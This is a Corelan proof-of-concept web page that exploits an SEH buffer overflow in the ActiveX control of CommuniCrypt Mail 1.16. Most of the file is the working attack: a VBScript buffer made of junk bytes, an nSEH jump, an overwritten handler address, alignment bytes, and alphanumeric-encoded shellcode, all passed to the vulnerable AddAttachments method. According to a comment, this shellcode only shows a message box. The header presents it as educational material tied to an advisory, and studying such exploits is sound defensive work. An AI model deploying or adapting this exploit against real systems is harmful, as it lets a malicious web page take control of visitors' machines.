71 lines
No EOL
3.5 KiB
HTML
71 lines
No EOL
3.5 KiB
HTML
<html>
|
|
<!--
|
|
|------------------------------------------------------------------|
|
|
| __ __ |
|
|
| _________ ________ / /___ _____ / /____ ____ _____ ___ |
|
|
| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |
|
|
| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |
|
|
| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |
|
|
| |
|
|
| http://www.corelan.be:8800 |
|
|
| security@corelan.be |
|
|
| |
|
|
|-------------------------------------------------[ EIP Hunters ]--|
|
|
|
|
# Software : CommuniCrypt Mail 1.16 (ANSMTP.dll/AOSMTP.dll) ActiveX
|
|
# Author : Lincoln
|
|
# Date : May 19, 2010
|
|
# Reference : http://www.corelan.be:8800/advisories.php?id=CORELAN-10-042
|
|
# OS : Windows
|
|
# Tested on : XP SP3 En (VirtualBox)
|
|
# Type of vuln : SEH
|
|
# Greetz to : Corelan Security Team
|
|
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
|
|
#
|
|
# Script provided 'as is', without any warranty.
|
|
# Use for educational purposes only.
|
|
# Do not use this code to do anything illegal !
|
|
#
|
|
# Note : you are not allowed to edit/modify this code.
|
|
# If you do, Corelan cannot be held responsible for any damages this may cause.
|
|
#
|
|
# Communicrypt is running a vulnerable version of ANSMTP.dll/AOSMTP.dll
|
|
# See advisory for more details
|
|
#
|
|
-->
|
|
<object classid='clsid:F8D07B72-B4B4-46A0-ACC0-C771D4614B82' id='target' ></object>
|
|
<script language='vbscript'>
|
|
|
|
junk = String(284, "A")
|
|
nseh = unescape("%eb%06%90%90")
|
|
seh = unescape("%1c%e4%01%10")
|
|
align = unescape("%5a%5a%5c%5a%5a%5a%5a%5a%90%90%90%90")
|
|
|
|
'msgbox: "Exploited by Corelan Security Team"
|
|
sc = ("TYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIK9KS8Z") & _
|
|
("N7XYT3JT1IPI1YPI1YQYG9QY790IW9W9730CPCPC73QSP7610ZBJQQ0X0P6PQQP0712K1QW1PQ") & _
|
|
("GBQQQRFR72G2VPQRW21Q1RQHPP7HW1W2RUQZPIQZ2Y1ZPKPM0KPKCYPQSTQU2TPJPTQUU10NVR") & _
|
|
("PNV2PBQJQVV1QYPYPBPD0N2KPQ51QTRPPLPKPC761TPL0NBK1R0V772LPLPKV1F6W478PL0KV1") & _
|
|
("RNQURPPNRK1U2FPPVX600OQWCXF02UPLVSPPQI1U0Q0KU1PKPOQXU1V1T0PL0KF0RLQV1TQURT") & _
|
|
("PL0K0Q0UQW0LPLPK0PV40CVUPPT81SFQ0KPZPL0K0B3ZW758PNBK1S3ZQWPPPE0QPJPKW8SSG6") & _
|
|
("PWV0QYPN2KQTBTPLPKQUPQPJPNQT2Q1YROF06QPK400KPL0NPLPO44PKRPQSQT0F2JPJ3QQZBO") & _
|
|
("W40MPGD10KSG78SYPJV1PK0OQYBO1Y2O0EBK1SPL1U44PQVXV1BEPIPN0NBKW2CJQURTQUV1PJ") & _
|
|
("PKQS1F0NBK0F2LW2BK0LPKQSRJQU0LPCFQQZPKPNRKQUV4PNRK1WRQ0MP8POBYV10T1V1T772L") & _
|
|
("1U6QPJ53POW2QTQX0F79QX1DPOD9PKV50MF979V2PP58PLPN0PPNW4PNQXRLPPPRPK68PMPLPK") & _
|
|
("0OQY2OPKPOPO49F1PUQVE4PMRKPQBNW9W8PMP20Q53PLW71UPLPD54611RPMP8PN2K792OQYBO") & _
|
|
("PKPOPL1YG255PGD8G3PX72PLPPRLPERPPKPOV1SHPGQSW5CRQVPNPEWDQU6XPQ5561RCW5VUPD") & _
|
|
("VRPM680QPLQTE40DQZ0LQYQXE6PCU60K0OPC2EQVU4PL79PK42V0600MRKPNPHPL5260PM0MBL") & _
|
|
("PN2GW72L77QDW6P2PKQHPCRN79ROQYBOQYROPBQX0QT4W5RQPQW8QUT0PC1HW46P1SPGPB0N1R") & _
|
|
("QUW4RQPK2KPKFXQS2L7544W6RFPK091XSS1UGH0P3QQRPM60QHQURPPQT8QRPYQUT0V0PTPQSE") & _
|
|
("0QSHPDVU1S0BPPE90Q3T1SPX0QP0QSBCQU6U1SPSPQT8PBQU1RPL0PE10PBN1R1X0QFP0QPSPP") & _
|
|
("RO60SBQUVXW30TPQ6PPPRBPCPIPQ481RPO73PYQRV4PPCUPQ3HW2E5PQU8QRPPPP2LW6PQPHQY") & _
|
|
("PNRH0PPL1VQTQURR0M69PI2QW4T1PJ2RQSSRQSSS0PPQQVP2PKPOPHPP60FQPOFPQV6PPKPO61") & _
|
|
("W5740HQU1JQQG1A")
|
|
|
|
|
|
boom = junk + nseh + seh + align + sc
|
|
|
|
target.AddAttachments boom
|
|
|
|
</script>
|
|
</html> |